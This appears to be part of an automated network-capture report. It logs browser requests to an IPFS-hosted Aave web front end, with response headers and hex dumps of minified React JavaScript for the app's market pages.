                                                                                                                                                                                                                                                  Data Ascii: lignItems:"center"},children:[(0,P.jsx)(xe.T1,{symbol:"AAVE",sx:{width:16,height:16}}),(0,P.jsx)(pe.B,{value:t,variant:"subheader1"})]})}),!u&&(0,P.jsx)(he.X,{align:"flex-start",caption:(0,P.jsx)(fe.M,{avatarProps:{size:ue.D.XS},titleProps:{variant:"subhe


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  138192.168.2.549864209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC909OUTGET /_next/static/chunks/pages/markets-7557748c63adf50d.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                  Purpose: prefetch
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1364INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 27123
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigc3wogh5adzpwl3au3ekalad3uxaht7hef5ucwpohrt7lysy7nzy"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/pages/markets-7557748c63adf50d.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiarzqpstoo26we45swmenr4cty2xldwzxkk3de3tw2jrdlwkngi2a,bafkreigc3wogh5adzpwl3au3ekalad3uxaht7hef5ucwpohrt7lysy7nzy
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC139INData Raw: 78 2d 69 70 66 73 2d 70 6f 70 3a 20 72 61 69 6e 62 6f 77 2d 6e 79 35 2d 30 34 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 31 33 30 32 36 39 39 30 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 38 31 33 39 39 35 30 66 34 37 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: x-ipfs-pop: rainbow-ny5-04CF-Cache-Status: HITAge: 13026990Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e48139950f47-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1235INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 31 36 32 5d 2c 7b 34 38 34 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 4d 61 72 6b 65 74 43 6f 6e 74 61 69 6e 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 65 7d 2c 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 65 7d 2c 6d 61 72 6b 65 74 43 6f 6e 74 61 69 6e 65 72 50 72 6f 70 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6a 65 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 35 39 34 39 39 29 2c 69 3d 6e 28 36 34 32 38 38 29 2c 73 3d 6e 28
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1162],{4840:function(e,t,n){"use strict";n.r(t),n.d(t,{MarketContainer:function(){return ye},default:function(){return fe},marketContainerProps:function(){return je}});var r=n(59499),i=n(64288),s=n(
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6f 6c 3a 6e 2e 69 63 6f 6e 53 79 6d 62 6f 6c 2c 66 6f 6e 74 53 69 7a 65 3a 22 6c 61 72 67 65 22 7d 29 2c 28 30 2c 7a 2e 6a 73 78 73 29 28 73 2e 5a 2c 7b 73 78 3a 7b 70 6c 3a 33 2e 35 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 7a 2e 6a 73 78 29 28 75 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 68 34 22 2c 6e 6f 57 72 61 70 3a 21 30 2c 63 68 69 6c 64 72 65 6e 3a 6e 2e 6e 61 6d 65 7d 29 2c 28 30 2c 7a 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 70 3a 7b 78 73 3a 22 30 22 2c 78 73 6d 3a 22 33 2e 36 32 35 70 78 20 30 70 78 22 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 7a 2e 6a 73 78 73 29 28 75 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 32 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 6d
                                                                                                                                                                                                                                                  Data Ascii: ol:n.iconSymbol,fontSize:"large"}),(0,z.jsxs)(s.Z,{sx:{pl:3.5,overflow:"hidden"},children:[(0,z.jsx)(u.Z,{variant:"h4",noWrap:!0,children:n.name}),(0,z.jsx)(s.Z,{sx:{p:{xs:"0",xsm:"3.625px 0px"}},children:(0,z.jsxs)(u.Z,{variant:"subheader2",color:"text.m
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 22 45 54 48 22 3d 3d 3d 6e 2e 73 79 6d 62 6f 6c 26 26 22 70 72 6f 74 6f 5f 6d 61 69 6e 6e 65 74 5f 76 33 22 3d 3d 3d 69 26 26 28 30 2c 7a 2e 6a 73 78 29 28 73 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 7a 2e 6a 73 78 29 28 6a 2e 72 55 2c 7b 68 72 65 66 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 76 65 72 6e 61 6e 63 65 2e 61 61 76 65 2e 63 6f 6d 2f 74 2f 61 72 66 63 2d 6d 65 72 69 74 2d 61 2d 6e 65 77 2d 61 61 76 65 2d 61 6c 69 67 6e 6d 65 6e 74 2d 75 73 65 72 2d 72 65 77 61 72 64 2d 73 79 73 74 65 6d 2f 31 36 36 34 36 22 2c 73 74 79 6c 65 3a 7b 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 6e 6f 6e 65 22 2c 63 6f 6c 6f 72 3a 22 69 6e 68 65 72 69 74 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 7d 2c 74 61 72 67 65 74 3a 22 62 6c 61 6e 6b 22
                                                                                                                                                                                                                                                  Data Ascii: "ETH"===n.symbol&&"proto_mainnet_v3"===i&&(0,z.jsx)(s.Z,{children:(0,z.jsx)(j.rU,{href:"https://governance.aave.com/t/arfc-merit-a-new-aave-alignment-user-reward-system/16646",style:{textDecoration:"none",color:"inherit",textAlign:"center"},target:"blank"
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 68 74 3a 32 34 7d 29 7d 29 5d 7d 29 2c 28 30 2c 7a 2e 6a 73 78 29 28 5a 2e 68 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 7a 2e 6a 73 78 29 28 52 2e 5a 2c 7b 77 69 64 74 68 3a 37 30 2c 68 65 69 67 68 74 3a 32 34 7d 29 7d 29 2c 28 30 2c 7a 2e 6a 73 78 29 28 5a 2e 68 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 7a 2e 6a 73 78 29 28 52 2e 5a 2c 7b 77 69 64 74 68 3a 37 30 2c 68 65 69 67 68 74 3a 32 34 7d 29 7d 29 2c 28 30 2c 7a 2e 6a 73 78 29 28 5a 2e 68 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 7a 2e 6a 73 78 29 28 52 2e 5a 2c 7b 77 69 64 74 68 3a 37 30 2c 68 65 69 67 68 74 3a 32 34 7d 29 7d 29 2c 28 30 2c 7a 2e 6a 73 78 29 28 5a 2e 68 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 7a 2e 6a 73 78 29 28 52 2e 5a 2c 7b 77 69 64 74 68 3a 37 30 2c 68 65 69 67 68 74 3a 32
                                                                                                                                                                                                                                                  Data Ascii: ht:24})})]}),(0,z.jsx)(Z.h,{children:(0,z.jsx)(R.Z,{width:70,height:24})}),(0,z.jsx)(Z.h,{children:(0,z.jsx)(R.Z,{width:70,height:24})}),(0,z.jsx)(Z.h,{children:(0,z.jsx)(R.Z,{width:70,height:24})}),(0,z.jsx)(Z.h,{children:(0,z.jsx)(R.Z,{width:70,height:2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 7d 7d 29 2c 28 30 2c 7a 2e 6a 73 78 29 28 58 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28 30 2c 7a 2e 6a 73 78 29 28 6c 2e 63 43 2c 7b 69 64 3a 22 54 6f 74 61 6c 20 62 6f 72 72 6f 77 65 64 22 7d 29 2c 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 6d 62 3a 33 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 7a 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 7b 78 73 3a 22 66 6c 65 78 2d 65 6e 64 22 7d 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 4e 75 6d 62 65 72 28 74 2e 74
                                                                                                                                                                                                                                                  Data Ascii: }}),(0,z.jsx)(X.X,{caption:(0,z.jsx)(l.cC,{id:"Total borrowed"}),captionVariant:"description",mb:3,children:(0,z.jsx)(s.Z,{sx:{display:"flex",flexDirection:"column",alignItems:{xs:"flex-end"},justifyContent:"center",textAlign:"center"},children:Number(t.t
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 3a 22 45 6c 69 67 69 62 6c 65 20 66 6f 72 20 3c 30 3e 32 2e 31 4d 24 3c 2f 30 3e 20 77 45 54 48 20 43 6f 6d 6d 75 6e 69 74 79 20 50 72 6f 67 72 61 6d 20 5c 75 64 38 33 64 5c 75 64 63 37 62 22 2c 63 6f 6d 70 6f 6e 65 6e 74 73 3a 7b 30 3a 28 30 2c 7a 2e 6a 73 78 29 28 22 73 74 72 6f 6e 67 22 2c 7b 7d 29 7d 7d 29 2c 28 30 2c 7a 2e 6a 73 78 29 28 4c 2e 47 2c 7b 77 72 61 70 70 65 72 50 72 6f 70 73 3a 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 7d 2c 65 76 65 6e 74 3a 7b 65 76 65 6e 74 4e 61 6d 65 3a 56 2e 76 68 2e 54 4f 4f 4c 5f 54 49 50 2c 65 76 65 6e 74 50 61 72 61 6d 73 3a 7b 74 6f 6f 6c 74 69 70 3a 22 43 6f 6d 6d 75 6e 69 74 79 20 52 65 77 61 72 64 73 22 7d 7d
                                                                                                                                                                                                                                                  Data Ascii: :"Eligible for <0>2.1M$</0> wETH Community Program \ud83d\udc7b",components:{0:(0,z.jsx)("strong",{})}}),(0,z.jsx)(L.G,{wrapperProps:{sx:{display:"inline-flex",alignItems:"center"}},event:{eventName:V.vh.TOOL_TIP,eventParams:{tooltip:"Community Rewards"}}
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 2e 6a 73 78 29 28 52 2e 5a 2c 7b 77 69 64 74 68 3a 34 35 2c 68 65 69 67 68 74 3a 32 30 7d 29 7d 29 2c 28 30 2c 7a 2e 6a 73 78 29 28 58 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28 30 2c 7a 2e 6a 73 78 29 28 52 2e 5a 2c 7b 77 69 64 74 68 3a 31 30 30 2c 68 65 69 67 68 74 3a 32 30 7d 29 2c 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 6d 62 3a 34 2c 61 6c 69 67 6e 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 7a 2e 6a 73 78 29 28 52 2e 5a 2c 7b 77 69 64 74 68 3a 34 35 2c 68 65 69 67 68 74 3a 32 30 7d 29 7d 29 2c 28 30 2c 7a 2e 6a 73 78 29 28 52 2e 5a 2c 7b 77 69 64 74 68 3a 22 31 30 30 25 22 2c 68 65 69 67 68 74 3a 33 38 7d 29 5d 7d 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 24 28 65 2c 74 29 7b 76
                                                                                                                                                                                                                                                  Data Ascii: .jsx)(R.Z,{width:45,height:20})}),(0,z.jsx)(X.X,{caption:(0,z.jsx)(R.Z,{width:100,height:20}),captionVariant:"description",mb:4,align:"flex-start",children:(0,z.jsx)(R.Z,{width:45,height:20})}),(0,z.jsx)(R.Z,{width:"100%",height:38})]})};function $(e,t){v
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6c 5b 30 5d 2c 64 3d 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 63 3f 22 73 79 6d 62 6f 6c 22 3d 3d 3d 73 3f 74 2e 73 6f 72 74 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 73 79 6d 62 6f 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3c 74 2e 73 79 6d 62 6f 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3f 2d 31 3a 31 7d 29 29 3a 74 2e 73 6f 72 74 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 5b 73 5d 2d 74 5b 73 5d 7d 29 29 3a 22 73 79 6d 62 6f 6c 22 3d 3d 3d 73 3f 74 2e 73 6f 72 74 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 73 79 6d 62 6f 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3c 65 2e 73 79 6d 62 6f 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3f 2d 31 3a 31 7d 29 29 3a
                                                                                                                                                                                                                                                  Data Ascii: l[0],d=l[1];return c?"symbol"===s?t.sort((function(e,t){return e.symbol.toUpperCase()<t.symbol.toUpperCase()?-1:1})):t.sort((function(e,t){return e[s]-t[s]})):"symbol"===s?t.sort((function(e,t){return t.symbol.toUpperCase()<e.symbol.toUpperCase()?-1:1})):
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 69 64 20 30 3a 6f 2e 62 6f 72 72 6f 77 43 61 70 29 3e 30 26 26 28 76 3d 73 65 2e 4f 2e 6d 69 6e 28 28 30 2c 69 65 2e 68 45 29 28 28 6e 75 6c 6c 3d 3d 3d 6f 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 74 6f 74 61 6c 44 65 62 74 29 7c 7c 30 29 2c 28 30 2c 69 65 2e 68 45 29 28 28 6e 75 6c 6c 3d 3d 3d 6f 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 62 6f 72 72 6f 77 43 61 70 29 7c 7c 30 29 29 2e 74 6f 4e 75 6d 62 65 72 28 29 29 2c 28 30 2c 7a 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 70 74 3a 35 2c 6d 62 3a 31 30 2c 70 78 3a 7b 6d 64 3a 36 7d 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 6a
                                                                                                                                                                                                                                                  Data Ascii: id 0:o.borrowCap)>0&&(v=se.O.min((0,ie.hE)((null===o||void 0===o?void 0:o.totalDebt)||0),(0,ie.hE)((null===o||void 0===o?void 0:o.borrowCap)||0)).toNumber()),(0,z.jsx)(s.Z,{sx:{pt:5,mb:10,px:{md:6},overflow:"hidden",display:"flex",flexDirection:"column",j


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  139192.168.2.549865209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC898OUTGET /_next/static/chunks/82-c4138125c2feb6d3.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                  Purpose: prefetch
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1358INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 10134
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreif2t4676lsjxly4wk5owj6eswqimmgfngz3bqn5ohnogzsxjqxdpq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/82-c4138125c2feb6d3.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreif2t4676lsjxly4wk5owj6eswqimmgfngz3bqn5ohnogzsxjqxdpq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13026990
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 38 32 30 62 62 34 36 61 35 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4820bb46a52-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1306INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 32 5d 2c 7b 38 33 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 42 69 67 4e 75 6d 62 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 2e 4f 24 7d 2c 66 6f 72 6d 61 74 46 69 78 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 53 35 7d 2c 46 69 78 65 64 46 6f 72 6d 61 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 78 4f 7d 2c 46 69 78 65 64 4e 75 6d 62 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 78 73 7d 2c 70 61 72 73
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[82],{833:function(e,t,r){r.r(t),r.d(t,{BigNumber:function(){return n.O$},formatFixed:function(){return o.S5},FixedFormat:function(){return o.xO},FixedNumber:function(){return o.xs},pars
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6e 65 2d 62 6c 6f 63 6b 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 74 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 73 65 63 6f 6e 64 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e
                                                                                                                                                                                                                                                  Data Ascii: ne-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[t.fontSize],color:{primary:(e.vars||e).palette.primary.main,secondary:(e.vars||e).palette.
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 72 65 64 75 63 65 28 28 28 65 2c 6e 2c 6f 29 3d 3e 28 65 2e 70 75 73 68 28 6e 29 2c 6f 3c 72 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 74 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 76 3d 28 30 2c 75 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 5b 74 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 74 7d 29 3d 3e 7b 6c 65 74 20 72 3d 28 30 2c 6f 2e 5a 29 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74
